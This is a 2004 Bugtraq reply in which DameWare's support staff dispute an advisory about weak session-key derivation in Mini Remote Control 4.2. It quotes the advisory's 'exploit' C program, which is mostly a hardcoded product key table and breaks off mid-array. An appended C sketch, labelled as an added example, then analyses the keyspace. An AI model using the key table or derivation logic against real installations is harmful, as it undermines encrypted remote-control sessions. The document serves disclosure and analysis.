Re: (HOAX) Dameware Mini Remote Control Version 4.2 - Weak Key Agreement Scheme

In-Reply-To: <20040430182646.29912.qmail@www.securityfocus.com>


This is definitely not an exploit, nor is it a vulnerability and therefore inaccurate & misleading. Furthermore, the information submitted by ax09001h@hotmail.com has nothing to do with obtaining the Session Encryption Key, nor does it reveal any confidential information. It is entirely "pre-authentication" information that has nothing to do with the Session Encryption Key, and it cannot be used to obtain the actual Session Encryption Key.

The "Pre Authentication" data that is being encrypted/decrypted at this point in the remote control connection is not sensitive information and could just as well be sent in plain text. This so-called "weak key" is not used for encrypting sensitive data and is only used once for a single transmission of pre authentication data.

ax09001h@hotmail.com made no attempts to contact DameWare Development directly to verify this claim before releasing the information. It is extremely irresponsible for anyone to release this kind of information without first contacting the vendor to verify its accuracy. Based on his or her actions it's fairly obvious that this anonymous person and/or company are deliberately attempting to discredit DameWare Development & its Mini Remote Control program.

Support Staff
DameWare Development, LLC.
http://www.dameware.com

>Date: 30 Apr 2004 18:26:46 -0000
>Message-ID: <20040430182646.29912.qmail@www.securityfocus.com>
>From: ax09001h <ax09001h@hotmail.com>
>To: bugtraq@securityfocus.com
>Subject: Dameware Mini Remote Control Version 4.2 - Weak Key Agreement Scheme
>
>
>
>Title: Dameware Mini Remote Control Version 4.2 - Weak Key Agreement Scheme
>
>Versions: 	Dameware Mini Remote Control Version 4.2
>		
>
>Vulnerability: The latest version of Dameware's Mini Remote Control System uses a weak key agreement scheme. The scheme consists of the sharing of pointers into a fixed key lookup table. Both the client and the server have access to a key lookup table (KLT) consisting of 1000 32-bit values. Prior to encrypting traffic the server sends to the client a series of 32-bit integers, call it the key index table (KIT). For the sake of description let's call the indices klt_idx[4], an array of 4 32-bit integers. The klt_idx are set as follows:
>
>klt_idx[0] = KIT[100];
>klt_idx[1] = KIT[4];
>klt_idx[2] = 42;
>klt_idx[3] = KIT[37];
>
>The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
>
>	sk[0] = KLT[klt_idx[0]];
>	sk[1] = KLT[klt_idx[1]]; 
>	sk[2] = KLT[klt_idx[2]];
>	sk[3] = KLT[klt_idx[3]];
>
>This of course produces 0-bits of security.
>
>They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above constructed key using Blowfish in cipher block chaining mode with an IV = 0.  
>
>Exploit:
>
>/*
>
>	dwgenkey.c			dameware generate key program.
>
>					this function mimics the dameware
>					key generation algorithm used to 
>					pass encrypted windows authentication 
>					across between client and server
>			
>
>					ax09001h@hotmail.com
>
>
>*/
>
>
>#include <stdio.h>
>#include <stdlib.h>
>
>
>unsigned int	KLT [1000] = 
>{
>	0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
>	0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
>	0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,	0x48A20FA2, 
>	0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,	0xBC2B83CD, 
>	0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,	0x5474C05, 
>	0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,	0xCFA8D725, 
>	0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, 
>	0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16,	0x846238D7, 0x9B9C7F88, 
>	0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD,	0x5434DB89, 0x2B00247B, 
>	0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8,	0x6E4F97D5, 0x8910C7AE, 
>	0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B,	0xB226FFC5, 0x5C1D1096, 
>	0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9,	0x80154A84, 0x38987089, 
>	0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04,	0xC790C3E5, 0xF0E9E87E, 
>	0xB9F8AF1C, 0xF797E46C, 0x5F2F339D,	0xB792AB5F, 0x462050F7, 0xF922EDBD, 
>	0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, 
>	0xAA69288,  0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, 
>	0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, 
>	0xC5B5AED3, 0x420BFE41,	0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, 
>	0xFD572127,	0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, 
>	0x1093FA43,	0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
>	0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
>	0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
>	0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
>	0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
>	0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
>	0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,	0x7A153138, 
>	0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,	0x2E464810, 
>	0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, 
>	0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, 
>	0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, 
>	0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, 
>	0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 	0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, 
>	0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, 
>	0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, 
>	0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, 
>	0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, 
>	0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, 
>	0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, 
>	0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, 
>	0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, 
>	0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, 
>	0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, 
>	0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, 
>	0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, 
>	0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, 
>	0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, 
>	0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, 
>	0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
>	0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
>	0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
>	0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,	0xF53E8558, 
>	0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, 
>	0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, 
>	0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, 
>	0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, 
>	0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, 
>	0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, 
>	0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, 
>	0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, 
>	0x51FA1A82, 0xB5A325A9,	0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, 
>	0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, 
>	0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, 
>	0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, 
>	0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, 
>	0xC421154,  0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
>	0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
>	0x7C07054,  0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9,  0x27C3B146,
>	0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
>	0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
>	0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
>	0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,	0x98E93630, 
>	0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,	0xAF2A72E8, 
>	0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, 
>	0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,	0xA3C182A3, 
>	0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB,	0x5E729975, 0x5285CEC2, 
>	0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597,	0xC36CD9A,  0xA45A497, 
>	0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF,	0xBF109C2E, 0x402A1D1C, 
>	0x67DEDD8,  0x97061C4A, 0x936BACD0, 0xC34A5C19,	0xF40F90FE, 0xD7B03D1, 
>	0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, 
>	0x76E7D2A6, 0x536501F,  0xC77CA12B,	0x5E6E2842, 0x9896F26C, 0x2BC45D27, 
>	0xE2FF89C7, 0x11FBC8C,  0x252652BD,	0x61AA26A4, 0xF3DF28A,  0xAFB90C39, 
>	0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE,	0x2630C3A2, 0xC0F995BC, 0x27677058, 
>	0x49E5FA9C, 0x3B66C518, 0x7654283D,	0xB8305341, 0x72E94CF,  0x3E181088, 
>	0x9F721122, 0xC536D545, 0x8BD48FE7,	0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, 
>	0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, 
>	0x2ABB9F51, 0xC90E060A,	0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, 
>	0x1644830E, 0xC210F8D0,	0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, 
>	0xC3650D3F, 0x832E301C,	0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, 
>	0x694B8053, 0x8C003F9E,	0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, 
>	0x151F60A6, 0x224E32E5,	0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, 
>	0x66C4A629, 0x1281D60A,	0xE0178028, 0x44E6DEBD, 0xBAAB265,  0x384C4B56, 
>	0xDC2F9A2C, 0x470211A4,	0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, 
>	0xC144F12E,	0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, 
>	0x6B32E419,	0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
>	0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA63
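
Added example, not part of the original thread and not DameWare's code: a C sketch of the key derivation as the quoted advisory describes it, using a constructed table (not the product's values) and an assumed KIT length of 101 entries. It shows that a peer-supplied index has to be range-checked before use, that sk[2] is identical in every session, and that three indices into a 1000-entry table allow at most 1000^3 distinct keys.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define KLT_SIZE 1000   /* table size given in the advisory */
#define KIT_LEN  101    /* assumed length: the scheme reads KIT[100], KIT[4], KIT[37] */

static uint32_t klt[KLT_SIZE];   /* constructed stand-in, NOT the product's table */

static void build_sample_klt(void) {
    uint32_t x = 0x12345678u;                 /* constructed seed */
    for (size_t i = 0; i < KLT_SIZE; i++) {
        x = x * 1664525u + 1013904223u;       /* LCG used only as filler */
        klt[i] = x;
    }
}

/* sk[] per the advisory's description; -1 if a peer-supplied index is out of range. */
static int derive_key(const uint32_t *kit, size_t kit_len, uint32_t sk[4]) {
    if (kit == NULL || kit_len < KIT_LEN) return -1;
    const uint32_t idx[4] = { kit[100], kit[4], 42, kit[37] };
    for (int i = 0; i < 4; i++) {
        if (idx[i] >= KLT_SIZE) return -1;    /* never index the table unchecked */
        sk[i] = klt[idx[i]];
    }
    return 0;
}

/* Upper bound on distinct keys: three free indices, each in 0..999. */
static uint64_t keyspace_upper_bound(void) {
    return (uint64_t)KLT_SIZE * KLT_SIZE * KLT_SIZE;
}

int main(void) {
    uint32_t kit_a[KIT_LEN] = {0}, kit_b[KIT_LEN] = {0}, a[4], b[4];
    build_sample_klt();
    kit_a[100] = 7;  kit_a[4] = 311; kit_a[37] = 998;   /* constructed session 1 */
    kit_b[100] = 55; kit_b[4] = 0;   kit_b[37] = 640;   /* constructed session 2 */
    if (derive_key(kit_a, KIT_LEN, a) || derive_key(kit_b, KIT_LEN, b)) return 1;
    printf("sk[2] identical across sessions: %s\n", a[2] == b[2] ? "yes" : "no");
    printf("distinct keys <= %llu (under 2^30)\n",
           (unsigned long long)keyspace_upper_bound());
    return 0;
}
```

A 128-bit cipher key built this way carries fewer than 30 bits of variability even before considering that the indices travel in the clear.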

